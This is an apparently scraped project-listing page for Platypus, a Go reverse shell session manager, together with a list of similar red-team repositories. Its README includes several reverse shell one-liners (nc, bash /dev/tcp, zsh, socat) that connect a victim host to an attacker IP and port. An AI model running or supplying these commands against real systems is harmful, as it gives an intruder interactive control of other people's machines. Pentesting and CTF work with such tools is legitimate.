WangYihang / Platypus
Licence: lgpl-3.0
π¨ A modern multiple reverse shell sessions manager wrote in go
Stars: β 559
Programming Languages
go
31211 projects - #10 most used programming language
Projects that are alternatives of or similar to Platypus
Karkinos
Penetration Testing and Hacking CTF's Swiss Army Knife with: Reverse Shell Handling - Encoding/Decoding - Encryption/Decryption - Cracking Hashes / Hashing
Stars: β 115 (-79.43%)
Mutual labels: pentesting, ctf, reverse-shell
Hack Tools
The all-in-one Red Team extension for Web Pentester π
Stars: β 2,750 (+391.95%)
Mutual labels: pentesting, red-team, reverse-shell
Hrshell
HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.
Stars: β 193 (-65.47%)
Mutual labels: pentesting, red-team, reverse-shell
Injuredandroid
A vulnerable Android application that shows simple examples of vulnerabilities in a ctf style.
Stars: β 317 (-43.29%)
Mutual labels: pentesting, ctf
Red Teaming Toolkit
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
Stars: β 5,615 (+904.47%)
Mutual labels: pentesting, red-team
Red-Team-Essentials
This repo will contain some basic pentest/RT commands.
Stars: β 22 (-96.06%)
Mutual labels: pentesting, red-team
ReversePowerShell
Functions that can be used to gain Reverse Shells with PowerShell
Stars: β 48 (-91.41%)
Mutual labels: reverse-shell, red-team
Stowaway
π»Stowaway -- Multi-hop Proxy Tool for pentesters
Stars: β 500 (-10.55%)
Mutual labels: pentesting, ctf
Black Hat Rust
Applied offensive security with Rust - Early access - https://academy.kerkour.com/black-hat-rust?coupon=GITHUB
Stars: β 331 (-40.79%)
Mutual labels: pentesting, red-team
Infosec reference
An Information Security Reference That Doesn't Suck; https://rmusser.net/git/admin-2/Infosec_Reference for non-MS Git hosted version.
Stars: β 4,162 (+644.54%)
Mutual labels: pentesting, red-team
Awesome Privilege Escalation
A curated list of awesome privilege escalation
Stars: β 413 (-26.12%)
Mutual labels: pentesting, ctf
Security Tools
Collection of small security tools, mostly in Bash and Python. CTFs, Bug Bounty and other stuff.
Stars: β 509 (-8.94%)
Mutual labels: pentesting, ctf
ShonyDanza
A customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.
Stars: β 86 (-84.62%)
Mutual labels: pentesting, red-team
Pentmenu
A bash script for recon and DOS attacks
Stars: β 288 (-48.48%)
Mutual labels: pentesting, red-team
linux-rootkits-red-blue-teams
Linux Rootkits (4.x Kernel)
Stars: β 56 (-89.98%)
Mutual labels: pentesting, red-team
Aiodnsbrute
Python 3.5+ DNS asynchronous brute force utility
Stars: β 370 (-33.81%)
Mutual labels: pentesting, red-team
Packetwhisper
PacketWhisper: Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server.
Stars: β 405 (-27.55%)
Mutual labels: pentesting, red-team
Bigbountyrecon
BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation.
Stars: β 541 (-3.22%)
Mutual labels: pentesting, red-team
Covertutils
A framework for Backdoor development!
Stars: β 424 (-24.15%)
Mutual labels: pentesting, reverse-shell
juice-shop-ctf
Capture-the-Flag (CTF) environment setup tools for OWASP Juice Shop supporting CTFd, FBCTF and RootTheBox
Stars: β 287 (-48.66%)
Mutual labels: pentesting, ctf
Platypus
A modern multiple reverse shell sessions/clients manager via terminal written in go
Features
- [x] Multiple service listening port
- [x] Multiple client connections
- [x] RESTful API
- [x] Reverse shell as a service (Pop a reverse shell in multiple languages without remembering idle commands)
- [x] Download/Upload file with progress bar
- [x] Full interactive shell
- [x] Using vim gracefully in reverse shell
- [x] Using CTRL+C and CTRL+Z in reverse shell
- [x] Start servers automatically
- [x] Initialize from configuration file
Get Start
There are multiple ways to run this tool, feel free to choose one of the following method.
Run Platypus from source code
git clone https://github.com/WangYihang/Platypus
cd Platypus
go run platypus.go
Run Platypus from release binaries
- Download
Platypusprebuild binary from HERE - Run the downloaded executable file
[DEPRECATED due to out of date] Run Platypus from docker
// Build your docker image
docker build -t platypus .
// Start platypus from docker container, don't forget to create port mapping
docker run -it -p 9999:9999 platypus
Usage
Network Topology
- Attack IP:
192.168.174.132- Reverse Shell Service:
0.0.0.0:8080 - RESTful Service:
127.0.0.1:9090
- Reverse Shell Service:
- Victim IP:
192.168.174.128
Connecting victim and attacker
As we all know, the using senanrio of reverse shell is about both attacker side and the victim side. Now we will seperate the usage guide into two views, the attacker's view and the victim's view.
Attacker's view
- First the attacker should start platypus and listen on some port (eg: 8080).
- Then the victim is attacked by the attacker and a reverse shell command will be executed on the machine of victim.
Victim's view
The victim machine will be hacked and execute the evil command to generate a reverse shell to attack.
Here are some reverse shell commands for various platform.
nc -e /bin/bash 192.168.174.132 8080
bash -c 'bash -i >/dev/tcp/192.168.174.132/8080 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.174.132 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.174.132:8080
Controlling the victim
List all victims
Select a victim
Interactive shell
Download file
Upload file
Advanced Usages
- Reverse shell as a Service (RaaS)
- RESTful API
Using VIM in Reverse Shell (Only on Linux)
Demonstration is to be done.
Other Materials
TODOs
- [ ] #7 Allow user to choose operation for the same IP income connection
- [ ] #25 Replace new connection from same IP with old one
- [ ] #10 Use database to record all events and interacting logs
- [ ] #12 Add capability of setting human-readable name of session
- [ ] #15 Encryption support
- [ ] #19 Read command file when start up
- [ ] #24 Upgrading platypus to a system service
- [ ] Upgrade to Metepreter session
- [ ] Test driven development [WIP]
- [ ] Continuous Integration
- [ ] Heart beating packet
- [ ] More interfaces in RESTful API
- [ ] RESTful API should auth
- [ ] Use crontab
- [ ] Use HR package to detect the status of client (maybe
echo $random_string) - [ ] Provide full kernel API
- [ ] List file
- [ ] Web UI
- [ ] Benchmark
- [x] Add config file
- [x] #30 RaaS support specifying language, thanks for @RicterZ
- [x] Execute user input when input is not a built-in command
- [x] Download/Upload progress bar
- [x] #6 Send one command to all clients at once (Meta Command)
- [x] User guide
- [x] Upload file
- [x] Download file
- [x] #13 Add a display current prompt setting
- [x] Global Config (eg. #9 BlockSameIP)
- [x] #11 Make STDOUT and STDERR distinguishable
- [x] #23 Case insensitive CLI
- [x] Delete command by @EddieIvan01
- [x] OS Detection (Linux|Windows) by @EddieIvan01
- [x] Upgrade common reverse shell session into full interactive session
- [x] Docker support (Added by @yeya24)
Contributors
This project exists thanks to all the people who contribute.
Backers
Thank you to all our backers! π [Become a backer]
Sponsors
Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].